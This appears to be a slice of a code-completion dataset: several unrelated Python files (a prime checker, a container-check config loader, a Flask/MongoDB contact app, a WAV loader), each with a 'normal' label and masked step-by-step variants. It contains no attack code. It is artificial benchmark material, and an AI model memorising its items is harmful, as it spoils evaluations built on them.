+=1\n pbar.update(10)\n\n for i in range(num_clusters): # Save the results.\n pd.DataFrame(current_clusters[i], columns=['id']).to_csv(\"%s_cluster_%d.txt\" %(sys.argv[1], i), sep='\\t') \n",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
def primo(num):
    if num <= 1:  # 0, 1 and negative numbers are not prime
print(f"El numero {num} no es primo")
return None
else:
if num == 2:
print(f"El numero {num} es primo")
return None
else:
for i in range(2, num):
if num % i == 0:
print(f"El numero {num} no es primo")
return None
print(f"El numero {num} es primo")
def leerNumero():
numer = int(input("Escribe un numero ==> "))
primo(numer)
def main():
leerNumero()
if __name__ =="__main__":
main()
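# Expected behaviour: primo(7) -> "El numero 7 es primo",
# primo(9) -> "El numero 9 no es primo", primo(1) -> "El numero 1 no es primo".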
|
normal
|
{
"blob_id": "29eb1a1642d38160c138733e269bb3ba0c5d4bba",
"index": 9834,
"step-1": "<mask token>\n\n\ndef leerNumero():\n numer = int(input('Escribe un numero ==> '))\n primo(numer)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef leerNumero():\n numer = int(input('Escribe un numero ==> '))\n primo(numer)\n\n\ndef main():\n leerNumero()\n\n\n<mask token>\n",
"step-3": "def primo(num):\n if num < 1:\n print(f'El numero {num} no es primo')\n return None\n elif num == 2:\n print(f'El numero {num} es primo')\n return None\n else:\n for i in range(2, num):\n if num % i == 0:\n print(f'El numero {num} no es primo')\n return None\n print(f'El numero {num} es primo')\n\n\ndef leerNumero():\n numer = int(input('Escribe un numero ==> '))\n primo(numer)\n\n\ndef main():\n leerNumero()\n\n\n<mask token>\n",
"step-4": "def primo(num):\n if num < 1:\n print(f'El numero {num} no es primo')\n return None\n elif num == 2:\n print(f'El numero {num} es primo')\n return None\n else:\n for i in range(2, num):\n if num % i == 0:\n print(f'El numero {num} no es primo')\n return None\n print(f'El numero {num} es primo')\n\n\ndef leerNumero():\n numer = int(input('Escribe un numero ==> '))\n primo(numer)\n\n\ndef main():\n leerNumero()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\ndef primo(num):\n if num < 1:\n print(f\"El numero {num} no es primo\")\n return None\n else:\n if num == 2:\n print(f\"El numero {num} es primo\")\n return None\n else:\n for i in range(2, num):\n if num % i == 0:\n print(f\"El numero {num} no es primo\")\n return None\n print(f\"El numero {num} es primo\") \n\n\ndef leerNumero():\n numer = int(input(\"Escribe un numero ==> \"))\n primo(numer)\n\n\ndef main():\n leerNumero()\n\n\nif __name__ ==\"__main__\":\n main() ",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import json
import os
from six import iteritems
from ..exceptions import ColinConfigException
from ..constant import CONFIG_DIRECTORY, JSON
from ..loader import load_check_implementation
from ..target import is_compatible
class Config(object):
def __init__(self, name=None):
"""
Load config for colin.
:param name: str (name of the config file (without .json), default is "default"
"""
self.name = name or "default"
config_path = os.path.join(get_config_directory(), self.name + JSON)
try:
with open(config_path, mode='r') as config_file:
self.config_dict = json.load(config_file)
except Exception as ex:
raise ColinConfigException("Config file '{}' cannot be loaded.".format(config_path))
def get_checks(self, target_type, group=None, severity=None, tags=None):
"""
Get all checks for given type/group/severity/tags.
:param target_type: TargetType enum
:param group: str (if not group, get checks from all groups/directories)
:param severity: str (optional x required)
:param tags: list of str
:return: list of check instances
"""
check_files = self._get_check_files(group=group,
severity=severity)
groups = {}
for (group, check_files) in iteritems(check_files):
checks = []
for severity, check_file in check_files:
check_classes = load_check_implementation(path=check_file, severity=severity)
for check_class in check_classes:
if is_compatible(target_type, check_class, severity, tags):
checks.append(check_class)
groups[group] = checks
return groups
@staticmethod
def get_check_file(group, name):
"""
Get the check file from given group with given name.
:param group: str
:param name: str
:return: str (path)
"""
return os.path.join(get_checks_path(), group, name + ".py")
@staticmethod
def get_check_files(group, names, severity):
"""
Get the check files from given group with given names.
:param severity: str
:param group: str
:param names: list of str
:return: list of str (paths)
"""
check_files = []
for f in names:
check_file = Config.get_check_file(group=group,
name=f)
check_files.append((severity, check_file))
return check_files
def _get_check_groups(self, group=None):
"""
Get check group to validate
:param group: str (if None, all from the config will be used)
:return: list of str (group names)
"""
groups = [g for g in self.config_dict]
if group:
if group in groups:
check_groups = [group]
else:
check_groups = []
else:
check_groups = groups
return check_groups
def _get_check_files(self, group=None, severity=None):
"""
Get file names with checks filtered by group and severity.
:param group: str (if None, all groups will be used)
:param severity: str (if None, all severities will be used)
:return: list of str (absolute paths)
"""
groups = {}
for g in self._get_check_groups(group):
check_files = []
for sev, files in iteritems(self.config_dict[g]):
if (not severity) or severity == sev:
check_files += Config.get_check_files(group=g,
names=files,
severity=sev)
groups[g] = check_files
return groups
def get_checks_path():
"""
Get path to checks.
:return: str (absolute path of directory with checks)
"""
rel_path = os.path.join(os.pardir, os.pardir, os.pardir, "checks")
return os.path.abspath(os.path.join(__file__, rel_path))
def get_config_directory():
"""
Get the directory with config files
:return: str
"""
local_share = os.path.join(os.path.expanduser("~"),
".local",
CONFIG_DIRECTORY)
if os.path.isdir(local_share) and os.path.exists(local_share):
return local_share
usr_local_share = os.path.join("/usr/local", CONFIG_DIRECTORY)
if os.path.isdir(usr_local_share) and os.path.exists(usr_local_share):
return usr_local_share
raise ColinConfigException("Config directory cannot be found.")
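# The config JSON loaded by Config() is assumed to map group -> severity -> check names,
# which is the shape _get_check_files() iterates over; illustrative example (names invented):
# {
#     "images": {
#         "required": ["image_labels"],
#         "optional": ["image_size"]
#     }
# }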
|
normal
|
{
"blob_id": "7bb9455e6f0c15ab0be6963cff06ff41df73e6e0",
"index": 2583,
"step-1": "<mask token>\n\n\nclass Config(object):\n\n def __init__(self, name=None):\n \"\"\"\n Load config for colin.\n\n :param name: str (name of the config file (without .json), default is \"default\"\n \"\"\"\n self.name = name or 'default'\n config_path = os.path.join(get_config_directory(), self.name + JSON)\n try:\n with open(config_path, mode='r') as config_file:\n self.config_dict = json.load(config_file)\n except Exception as ex:\n raise ColinConfigException(\"Config file '{}' cannot be loaded.\"\n .format(config_path))\n\n def get_checks(self, target_type, group=None, severity=None, tags=None):\n \"\"\"\n Get all checks for given type/group/severity/tags.\n\n :param target_type: TargetType enum\n :param group: str (if not group, get checks from all groups/directories)\n :param severity: str (optional x required)\n :param tags: list of str\n :return: list of check instances\n \"\"\"\n check_files = self._get_check_files(group=group, severity=severity)\n groups = {}\n for group, check_files in iteritems(check_files):\n checks = []\n for severity, check_file in check_files:\n check_classes = load_check_implementation(path=check_file,\n severity=severity)\n for check_class in check_classes:\n if is_compatible(target_type, check_class, severity, tags):\n checks.append(check_class)\n groups[group] = checks\n return groups\n\n @staticmethod\n def get_check_file(group, name):\n \"\"\"\n Get the check file from given group with given name.\n\n :param group: str\n :param name: str\n :return: str (path)\n \"\"\"\n return os.path.join(get_checks_path(), group, name + '.py')\n <mask token>\n\n def _get_check_groups(self, group=None):\n \"\"\"\n Get check group to validate\n\n :param group: str (if None, all from the config will be used)\n :return: list of str (group names)\n \"\"\"\n groups = [g for g in self.config_dict]\n if group:\n if group in groups:\n check_groups = [group]\n else:\n check_groups = []\n else:\n check_groups = groups\n return check_groups\n\n def _get_check_files(self, group=None, severity=None):\n \"\"\"\n Get file names with checks filtered by group and severity.\n\n :param group: str (if None, all groups will be used)\n :param severity: str (if None, all severities will be used)\n :return: list of str (absolute paths)\n \"\"\"\n groups = {}\n for g in self._get_check_groups(group):\n check_files = []\n for sev, files in iteritems(self.config_dict[g]):\n if not severity or severity == sev:\n check_files += Config.get_check_files(group=g, names=\n files, severity=sev)\n groups[g] = check_files\n return groups\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Config(object):\n\n def __init__(self, name=None):\n \"\"\"\n Load config for colin.\n\n :param name: str (name of the config file (without .json), default is \"default\"\n \"\"\"\n self.name = name or 'default'\n config_path = os.path.join(get_config_directory(), self.name + JSON)\n try:\n with open(config_path, mode='r') as config_file:\n self.config_dict = json.load(config_file)\n except Exception as ex:\n raise ColinConfigException(\"Config file '{}' cannot be loaded.\"\n .format(config_path))\n\n def get_checks(self, target_type, group=None, severity=None, tags=None):\n \"\"\"\n Get all checks for given type/group/severity/tags.\n\n :param target_type: TargetType enum\n :param group: str (if not group, get checks from all groups/directories)\n :param severity: str (optional x required)\n :param tags: list of str\n :return: list of check instances\n \"\"\"\n check_files = self._get_check_files(group=group, severity=severity)\n groups = {}\n for group, check_files in iteritems(check_files):\n checks = []\n for severity, check_file in check_files:\n check_classes = load_check_implementation(path=check_file,\n severity=severity)\n for check_class in check_classes:\n if is_compatible(target_type, check_class, severity, tags):\n checks.append(check_class)\n groups[group] = checks\n return groups\n\n @staticmethod\n def get_check_file(group, name):\n \"\"\"\n Get the check file from given group with given name.\n\n :param group: str\n :param name: str\n :return: str (path)\n \"\"\"\n return os.path.join(get_checks_path(), group, name + '.py')\n\n @staticmethod\n def get_check_files(group, names, severity):\n \"\"\"\n Get the check files from given group with given names.\n\n :param severity: str\n :param group: str\n :param names: list of str\n :return: list of str (paths)\n \"\"\"\n check_files = []\n for f in names:\n check_file = Config.get_check_file(group=group, name=f)\n check_files.append((severity, check_file))\n return check_files\n\n def _get_check_groups(self, group=None):\n \"\"\"\n Get check group to validate\n\n :param group: str (if None, all from the config will be used)\n :return: list of str (group names)\n \"\"\"\n groups = [g for g in self.config_dict]\n if group:\n if group in groups:\n check_groups = [group]\n else:\n check_groups = []\n else:\n check_groups = groups\n return check_groups\n\n def _get_check_files(self, group=None, severity=None):\n \"\"\"\n Get file names with checks filtered by group and severity.\n\n :param group: str (if None, all groups will be used)\n :param severity: str (if None, all severities will be used)\n :return: list of str (absolute paths)\n \"\"\"\n groups = {}\n for g in self._get_check_groups(group):\n check_files = []\n for sev, files in iteritems(self.config_dict[g]):\n if not severity or severity == sev:\n check_files += Config.get_check_files(group=g, names=\n files, severity=sev)\n groups[g] = check_files\n return groups\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Config(object):\n\n def __init__(self, name=None):\n \"\"\"\n Load config for colin.\n\n :param name: str (name of the config file (without .json), default is \"default\"\n \"\"\"\n self.name = name or 'default'\n config_path = os.path.join(get_config_directory(), self.name + JSON)\n try:\n with open(config_path, mode='r') as config_file:\n self.config_dict = json.load(config_file)\n except Exception as ex:\n raise ColinConfigException(\"Config file '{}' cannot be loaded.\"\n .format(config_path))\n\n def get_checks(self, target_type, group=None, severity=None, tags=None):\n \"\"\"\n Get all checks for given type/group/severity/tags.\n\n :param target_type: TargetType enum\n :param group: str (if not group, get checks from all groups/directories)\n :param severity: str (optional x required)\n :param tags: list of str\n :return: list of check instances\n \"\"\"\n check_files = self._get_check_files(group=group, severity=severity)\n groups = {}\n for group, check_files in iteritems(check_files):\n checks = []\n for severity, check_file in check_files:\n check_classes = load_check_implementation(path=check_file,\n severity=severity)\n for check_class in check_classes:\n if is_compatible(target_type, check_class, severity, tags):\n checks.append(check_class)\n groups[group] = checks\n return groups\n\n @staticmethod\n def get_check_file(group, name):\n \"\"\"\n Get the check file from given group with given name.\n\n :param group: str\n :param name: str\n :return: str (path)\n \"\"\"\n return os.path.join(get_checks_path(), group, name + '.py')\n\n @staticmethod\n def get_check_files(group, names, severity):\n \"\"\"\n Get the check files from given group with given names.\n\n :param severity: str\n :param group: str\n :param names: list of str\n :return: list of str (paths)\n \"\"\"\n check_files = []\n for f in names:\n check_file = Config.get_check_file(group=group, name=f)\n check_files.append((severity, check_file))\n return check_files\n\n def _get_check_groups(self, group=None):\n \"\"\"\n Get check group to validate\n\n :param group: str (if None, all from the config will be used)\n :return: list of str (group names)\n \"\"\"\n groups = [g for g in self.config_dict]\n if group:\n if group in groups:\n check_groups = [group]\n else:\n check_groups = []\n else:\n check_groups = groups\n return check_groups\n\n def _get_check_files(self, group=None, severity=None):\n \"\"\"\n Get file names with checks filtered by group and severity.\n\n :param group: str (if None, all groups will be used)\n :param severity: str (if None, all severities will be used)\n :return: list of str (absolute paths)\n \"\"\"\n groups = {}\n for g in self._get_check_groups(group):\n check_files = []\n for sev, files in iteritems(self.config_dict[g]):\n if not severity or severity == sev:\n check_files += Config.get_check_files(group=g, names=\n files, severity=sev)\n groups[g] = check_files\n return groups\n\n\ndef get_checks_path():\n \"\"\"\n Get path to checks.\n\n :return: str (absolute path of directory with checks)\n \"\"\"\n rel_path = os.path.join(os.pardir, os.pardir, os.pardir, 'checks')\n return os.path.abspath(os.path.join(__file__, rel_path))\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Config(object):\n\n def __init__(self, name=None):\n \"\"\"\n Load config for colin.\n\n :param name: str (name of the config file (without .json), default is \"default\"\n \"\"\"\n self.name = name or 'default'\n config_path = os.path.join(get_config_directory(), self.name + JSON)\n try:\n with open(config_path, mode='r') as config_file:\n self.config_dict = json.load(config_file)\n except Exception as ex:\n raise ColinConfigException(\"Config file '{}' cannot be loaded.\"\n .format(config_path))\n\n def get_checks(self, target_type, group=None, severity=None, tags=None):\n \"\"\"\n Get all checks for given type/group/severity/tags.\n\n :param target_type: TargetType enum\n :param group: str (if not group, get checks from all groups/directories)\n :param severity: str (optional x required)\n :param tags: list of str\n :return: list of check instances\n \"\"\"\n check_files = self._get_check_files(group=group, severity=severity)\n groups = {}\n for group, check_files in iteritems(check_files):\n checks = []\n for severity, check_file in check_files:\n check_classes = load_check_implementation(path=check_file,\n severity=severity)\n for check_class in check_classes:\n if is_compatible(target_type, check_class, severity, tags):\n checks.append(check_class)\n groups[group] = checks\n return groups\n\n @staticmethod\n def get_check_file(group, name):\n \"\"\"\n Get the check file from given group with given name.\n\n :param group: str\n :param name: str\n :return: str (path)\n \"\"\"\n return os.path.join(get_checks_path(), group, name + '.py')\n\n @staticmethod\n def get_check_files(group, names, severity):\n \"\"\"\n Get the check files from given group with given names.\n\n :param severity: str\n :param group: str\n :param names: list of str\n :return: list of str (paths)\n \"\"\"\n check_files = []\n for f in names:\n check_file = Config.get_check_file(group=group, name=f)\n check_files.append((severity, check_file))\n return check_files\n\n def _get_check_groups(self, group=None):\n \"\"\"\n Get check group to validate\n\n :param group: str (if None, all from the config will be used)\n :return: list of str (group names)\n \"\"\"\n groups = [g for g in self.config_dict]\n if group:\n if group in groups:\n check_groups = [group]\n else:\n check_groups = []\n else:\n check_groups = groups\n return check_groups\n\n def _get_check_files(self, group=None, severity=None):\n \"\"\"\n Get file names with checks filtered by group and severity.\n\n :param group: str (if None, all groups will be used)\n :param severity: str (if None, all severities will be used)\n :return: list of str (absolute paths)\n \"\"\"\n groups = {}\n for g in self._get_check_groups(group):\n check_files = []\n for sev, files in iteritems(self.config_dict[g]):\n if not severity or severity == sev:\n check_files += Config.get_check_files(group=g, names=\n files, severity=sev)\n groups[g] = check_files\n return groups\n\n\ndef get_checks_path():\n \"\"\"\n Get path to checks.\n\n :return: str (absolute path of directory with checks)\n \"\"\"\n rel_path = os.path.join(os.pardir, os.pardir, os.pardir, 'checks')\n return os.path.abspath(os.path.join(__file__, rel_path))\n\n\ndef get_config_directory():\n \"\"\"\n Get the directory with config files\n\n :return: str\n \"\"\"\n local_share = os.path.join(os.path.expanduser('~'), '.local',\n CONFIG_DIRECTORY)\n if os.path.isdir(local_share) and os.path.exists(local_share):\n return local_share\n usr_local_share = os.path.join('/usr/local', 
CONFIG_DIRECTORY)\n if os.path.isdir(usr_local_share) and os.path.exists(usr_local_share):\n return usr_local_share\n raise ColinConfigException('Config directory cannot be found.')\n",
"step-5": "import json\nimport os\n\nfrom six import iteritems\n\nfrom ..exceptions import ColinConfigException\nfrom ..constant import CONFIG_DIRECTORY, JSON\nfrom ..loader import load_check_implementation\nfrom ..target import is_compatible\n\n\nclass Config(object):\n\n def __init__(self, name=None):\n \"\"\"\n Load config for colin.\n\n :param name: str (name of the config file (without .json), default is \"default\"\n \"\"\"\n self.name = name or \"default\"\n config_path = os.path.join(get_config_directory(), self.name + JSON)\n try:\n with open(config_path, mode='r') as config_file:\n self.config_dict = json.load(config_file)\n except Exception as ex:\n raise ColinConfigException(\"Config file '{}' cannot be loaded.\".format(config_path))\n\n def get_checks(self, target_type, group=None, severity=None, tags=None):\n \"\"\"\n Get all checks for given type/group/severity/tags.\n\n :param target_type: TargetType enum\n :param group: str (if not group, get checks from all groups/directories)\n :param severity: str (optional x required)\n :param tags: list of str\n :return: list of check instances\n \"\"\"\n check_files = self._get_check_files(group=group,\n severity=severity)\n groups = {}\n for (group, check_files) in iteritems(check_files):\n checks = []\n for severity, check_file in check_files:\n\n check_classes = load_check_implementation(path=check_file, severity=severity)\n for check_class in check_classes:\n if is_compatible(target_type, check_class, severity, tags):\n checks.append(check_class)\n\n groups[group] = checks\n return groups\n\n @staticmethod\n def get_check_file(group, name):\n \"\"\"\n Get the check file from given group with given name.\n\n :param group: str\n :param name: str\n :return: str (path)\n \"\"\"\n return os.path.join(get_checks_path(), group, name + \".py\")\n\n @staticmethod\n def get_check_files(group, names, severity):\n \"\"\"\n Get the check files from given group with given names.\n\n :param severity: str\n :param group: str\n :param names: list of str\n :return: list of str (paths)\n \"\"\"\n check_files = []\n for f in names:\n check_file = Config.get_check_file(group=group,\n name=f)\n check_files.append((severity, check_file))\n return check_files\n\n def _get_check_groups(self, group=None):\n \"\"\"\n Get check group to validate\n\n :param group: str (if None, all from the config will be used)\n :return: list of str (group names)\n \"\"\"\n groups = [g for g in self.config_dict]\n if group:\n if group in groups:\n check_groups = [group]\n else:\n check_groups = []\n else:\n check_groups = groups\n return check_groups\n\n def _get_check_files(self, group=None, severity=None):\n \"\"\"\n Get file names with checks filtered by group and severity.\n\n :param group: str (if None, all groups will be used)\n :param severity: str (if None, all severities will be used)\n :return: list of str (absolute paths)\n \"\"\"\n groups = {}\n for g in self._get_check_groups(group):\n check_files = []\n for sev, files in iteritems(self.config_dict[g]):\n if (not severity) or severity == sev:\n check_files += Config.get_check_files(group=g,\n names=files,\n severity=sev)\n groups[g] = check_files\n return groups\n\n\ndef get_checks_path():\n \"\"\"\n Get path to checks.\n\n :return: str (absolute path of directory with checks)\n \"\"\"\n rel_path = os.path.join(os.pardir, os.pardir, os.pardir, \"checks\")\n return os.path.abspath(os.path.join(__file__, rel_path))\n\n\ndef get_config_directory():\n \"\"\"\n Get the directory with config files\n\n :return: str\n 
\"\"\"\n local_share = os.path.join(os.path.expanduser(\"~\"),\n \".local\",\n CONFIG_DIRECTORY)\n if os.path.isdir(local_share) and os.path.exists(local_share):\n return local_share\n\n usr_local_share = os.path.join(\"/usr/local\", CONFIG_DIRECTORY)\n if os.path.isdir(usr_local_share) and os.path.exists(usr_local_share):\n return usr_local_share\n\n raise ColinConfigException(\"Config directory cannot be found.\")\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
|
[
6,
7,
8,
9,
11
] |
from flask import Flask, render_template, request, url_for, redirect, jsonify, json
from pymongo import MongoClient
#database (MongoDB) connection
app = Flask(__name__)
conexao = MongoClient('localhost',27017)
db = conexao['teste_db']
#insert initial contacts
contato1 = {'nome': 'Lucas', 'email': '[email protected]', 'telefone': '11 99389-3244'}
contato2 = {'nome': 'Lara', 'email': '[email protected]', 'telefone': '11 99333-3556'}
catalogo = db.catalogo
catalogo.insert_one(contato1)
catalogo.insert_one(contato2)
#home page
@app.route('/')
def showMachineList():
return render_template('list.html')
@app.route("/insert_records", methods=['POST'])
def insert_records():
json_data = request.json['info']
nome = json_data['nome']
email = json_data['email']
telefone = json_data['telefone']
db.catalogo.insert_one({
'nome':nome,'email':email,'telefone':telefone
})
return jsonify(status='OK',message='inserted successfully')
@app.route('/get_records',methods=['POST'])
def get_records():
contatos = db.catalogo.find()
return render_template('list.html',contatos=contatos)
if __name__ == "__main__":
app.run(debug=True)
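# Illustrative client call for /insert_records (field names taken from the handler above,
# default Flask port assumed):
# curl -X POST http://localhost:5000/insert_records \
#      -H "Content-Type: application/json" \
#      -d '{"info": {"nome": "Ana", "email": "[email protected]", "telefone": "11 90000-0000"}}'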
|
normal
|
{
"blob_id": "05ca16303d0eb962249793164ac91795c45cc3c2",
"index": 9974,
"step-1": "<mask token>\n\n\[email protected]('/')\ndef showMachineList():\n return render_template('list.html')\n\n\[email protected]('/insert_records', methods=['POST'])\ndef insert_records():\n json_data = request.json['info']\n nome = json_data['nome']\n email = json_data['email']\n telefone = json_data['telefone']\n db.catalogo.insert_one({'nome': nome, 'email': email, 'telefone': telefone}\n )\n return jsonify(status='OK', message='inserted successfully')\n\n\[email protected]('/get_records', methods=['POST'])\ndef get_records():\n contatos = db.catalogo.find()\n return render_template('list.html', contatos=contatos)\n\n\n<mask token>\n",
"step-2": "<mask token>\ncatalogo.insert_one(contato1)\ncatalogo.insert_one(contato2)\n\n\[email protected]('/')\ndef showMachineList():\n return render_template('list.html')\n\n\[email protected]('/insert_records', methods=['POST'])\ndef insert_records():\n json_data = request.json['info']\n nome = json_data['nome']\n email = json_data['email']\n telefone = json_data['telefone']\n db.catalogo.insert_one({'nome': nome, 'email': email, 'telefone': telefone}\n )\n return jsonify(status='OK', message='inserted successfully')\n\n\[email protected]('/get_records', methods=['POST'])\ndef get_records():\n contatos = db.catalogo.find()\n return render_template('list.html', contatos=contatos)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-3": "<mask token>\napp = Flask(__name__)\nconexao = MongoClient('localhost', 27017)\ndb = conexao['teste_db']\ncontato1 = {'nome': 'Lucas', 'email': '[email protected]', 'telefone':\n '11 99389-3244'}\ncontato2 = {'nome': 'Lara', 'email': '[email protected]', 'telefone':\n '11 99333-3556'}\ncatalogo = db.catalogo\ncatalogo.insert_one(contato1)\ncatalogo.insert_one(contato2)\n\n\[email protected]('/')\ndef showMachineList():\n return render_template('list.html')\n\n\[email protected]('/insert_records', methods=['POST'])\ndef insert_records():\n json_data = request.json['info']\n nome = json_data['nome']\n email = json_data['email']\n telefone = json_data['telefone']\n db.catalogo.insert_one({'nome': nome, 'email': email, 'telefone': telefone}\n )\n return jsonify(status='OK', message='inserted successfully')\n\n\[email protected]('/get_records', methods=['POST'])\ndef get_records():\n contatos = db.catalogo.find()\n return render_template('list.html', contatos=contatos)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-4": "from flask import Flask, render_template, request, url_for, redirect, jsonify, json, request\nfrom pymongo import MongoClient\napp = Flask(__name__)\nconexao = MongoClient('localhost', 27017)\ndb = conexao['teste_db']\ncontato1 = {'nome': 'Lucas', 'email': '[email protected]', 'telefone':\n '11 99389-3244'}\ncontato2 = {'nome': 'Lara', 'email': '[email protected]', 'telefone':\n '11 99333-3556'}\ncatalogo = db.catalogo\ncatalogo.insert_one(contato1)\ncatalogo.insert_one(contato2)\n\n\[email protected]('/')\ndef showMachineList():\n return render_template('list.html')\n\n\[email protected]('/insert_records', methods=['POST'])\ndef insert_records():\n json_data = request.json['info']\n nome = json_data['nome']\n email = json_data['email']\n telefone = json_data['telefone']\n db.catalogo.insert_one({'nome': nome, 'email': email, 'telefone': telefone}\n )\n return jsonify(status='OK', message='inserted successfully')\n\n\[email protected]('/get_records', methods=['POST'])\ndef get_records():\n contatos = db.catalogo.find()\n return render_template('list.html', contatos=contatos)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n",
"step-5": "from flask import Flask, render_template, request, url_for, redirect,jsonify,json,request\n\nfrom pymongo import MongoClient\n\n#conexão bd\napp = Flask(__name__)\nconexao = MongoClient('localhost',27017)\ndb = conexao['teste_db']\n\n#inserindo contatos iniciais\ncontato1 = {'nome': 'Lucas', 'email': '[email protected]', 'telefone': '11 99389-3244'}\ncontato2 = {'nome': 'Lara', 'email': '[email protected]', 'telefone': '11 99333-3556'}\ncatalogo = db.catalogo\ncatalogo.insert_one(contato1)\ncatalogo.insert_one(contato2)\n\n\n#página inicial\[email protected]('/')\ndef showMachineList():\n return render_template('list.html')\n\[email protected](\"/insert_records\", methods=['POST'])\ndef insert_records():\n \n json_data = request.json['info']\n nome = json_data['nome']\n email = json_data['email']\n telefone = json_data['telefone']\n\n db.catalogo.insert_one({\n 'nome':nome,'email':email,'telefone':telefone\n })\n \n return jsonify(status='OK',message='inserted successfully')\n\[email protected]('/get_records',methods=['POST'])\ndef get_records():\n \n contatos = db.catalogo.find() \n\n return render_template('list.html',contatos=contatos)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from scipy.io import wavfile
import numpy
from matplotlib import pyplot as plt
import librosa
import noisereduce
def loadWavFile(fileName, filePath, savePlot, maxAudioLength, reduceNoise = True):
# Read file
# rate, data = wavfile.read(filePath)
# print(filePath, rate, data.shape, "audio length", data.shape[0] / rate, data[0])
data, rate = librosa.load(filePath, sr=None)
# print(filePath, rate, data.shape, "librosa audio length", data.shape[0] / rate, data[0])
if reduceNoise:
noiseRemovedData = noisereduce.reduce_noise(audio_clip=data, noise_clip=data[0:10000], verbose=False)
noiseRemovedData = noisereduce.reduce_noise(audio_clip=noiseRemovedData, noise_clip=data[-10000:], verbose=False)
data = noiseRemovedData
maxDataLength = int(maxAudioLength * rate)
padding = []
if data.shape[0] > maxDataLength:
raise ValueError("Max audio length breached")
else:
paddingDataLength = maxDataLength - data.shape[0]
padding = [0 for i in range(paddingDataLength)]
    # librosa.load returns mono audio by default; the stereo left-channel slice
    # (data[:,0]) is kept only as a commented reference
    leftSpeakerSound = data  # data[:,0]
# print("leftSpeakerSound.shape", leftSpeakerSound.shape)
audioWithPadding = numpy.concatenate((leftSpeakerSound, padding))
# print("audioWithPadding.shape", audioWithPadding.shape)
if savePlot:
fig, ax = plt.subplots()
ax.plot(audioWithPadding)
fig.suptitle(fileName)
fig.savefig("./output_img/wav/" + fileName + "_wav.png")
plt.close(fig)
return audioWithPadding, rate
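

# Usage sketch (hedged: the file path below is hypothetical; assumes a short WAV
# clip and, if savePlot=True, an existing ./output_img/wav/ directory):
# audio, rate = loadWavFile("example", "./data/example.wav", savePlot=False, maxAudioLength=5.0)
# print(audio.shape, rate)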
|
normal
|
{
"blob_id": "07ac061d7d1eaf23b6c95fbcbf6753f25e568188",
"index": 157,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef loadWavFile(fileName, filePath, savePlot, maxAudioLength, reduceNoise=True\n ):\n data, rate = librosa.load(filePath, sr=None)\n if reduceNoise:\n noiseRemovedData = noisereduce.reduce_noise(audio_clip=data,\n noise_clip=data[0:10000], verbose=False)\n noiseRemovedData = noisereduce.reduce_noise(audio_clip=\n noiseRemovedData, noise_clip=data[-10000:], verbose=False)\n data = noiseRemovedData\n maxDataLength = int(maxAudioLength * rate)\n padding = []\n if data.shape[0] > maxDataLength:\n raise ValueError('Max audio length breached')\n else:\n paddingDataLength = maxDataLength - data.shape[0]\n padding = [(0) for i in range(paddingDataLength)]\n leftSpeakerSound = data\n audioWithPadding = numpy.concatenate((leftSpeakerSound, padding))\n if savePlot:\n fig, ax = plt.subplots()\n ax.plot(audioWithPadding)\n fig.suptitle(fileName)\n fig.savefig('./output_img/wav/' + fileName + '_wav.png')\n plt.close(fig)\n return audioWithPadding, rate\n",
"step-3": "from scipy.io import wavfile\nimport numpy\nfrom matplotlib import pyplot as plt\nimport librosa\nimport noisereduce\n\n\ndef loadWavFile(fileName, filePath, savePlot, maxAudioLength, reduceNoise=True\n ):\n data, rate = librosa.load(filePath, sr=None)\n if reduceNoise:\n noiseRemovedData = noisereduce.reduce_noise(audio_clip=data,\n noise_clip=data[0:10000], verbose=False)\n noiseRemovedData = noisereduce.reduce_noise(audio_clip=\n noiseRemovedData, noise_clip=data[-10000:], verbose=False)\n data = noiseRemovedData\n maxDataLength = int(maxAudioLength * rate)\n padding = []\n if data.shape[0] > maxDataLength:\n raise ValueError('Max audio length breached')\n else:\n paddingDataLength = maxDataLength - data.shape[0]\n padding = [(0) for i in range(paddingDataLength)]\n leftSpeakerSound = data\n audioWithPadding = numpy.concatenate((leftSpeakerSound, padding))\n if savePlot:\n fig, ax = plt.subplots()\n ax.plot(audioWithPadding)\n fig.suptitle(fileName)\n fig.savefig('./output_img/wav/' + fileName + '_wav.png')\n plt.close(fig)\n return audioWithPadding, rate\n",
"step-4": "from scipy.io import wavfile\nimport numpy\nfrom matplotlib import pyplot as plt\nimport librosa\nimport noisereduce\n\ndef loadWavFile(fileName, filePath, savePlot, maxAudioLength, reduceNoise = True):\n # Read file\n # rate, data = wavfile.read(filePath)\n # print(filePath, rate, data.shape, \"audio length\", data.shape[0] / rate, data[0])\n\n data, rate = librosa.load(filePath, sr=None)\n # print(filePath, rate, data.shape, \"librosa audio length\", data.shape[0] / rate, data[0])\n if reduceNoise:\n noiseRemovedData = noisereduce.reduce_noise(audio_clip=data, noise_clip=data[0:10000], verbose=False)\n noiseRemovedData = noisereduce.reduce_noise(audio_clip=noiseRemovedData, noise_clip=data[-10000:], verbose=False)\n data = noiseRemovedData\n\n\n maxDataLength = int(maxAudioLength * rate)\n padding = []\n if data.shape[0] > maxDataLength:\n raise ValueError(\"Max audio length breached\")\n else:\n paddingDataLength = maxDataLength - data.shape[0]\n padding = [0 for i in range(paddingDataLength)]\n\n # data is stereo sound. take left speaker only\n leftSpeakerSound = data # data[:,0]\n # print(\"leftSpeakerSound.shape\", leftSpeakerSound.shape)\n\n audioWithPadding = numpy.concatenate((leftSpeakerSound, padding))\n # print(\"audioWithPadding.shape\", audioWithPadding.shape)\n\n if savePlot:\n fig, ax = plt.subplots()\n ax.plot(audioWithPadding)\n fig.suptitle(fileName)\n fig.savefig(\"./output_img/wav/\" + fileName + \"_wav.png\")\n plt.close(fig)\n\n return audioWithPadding, rate",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from sklearn.preprocessing import RobustScaler
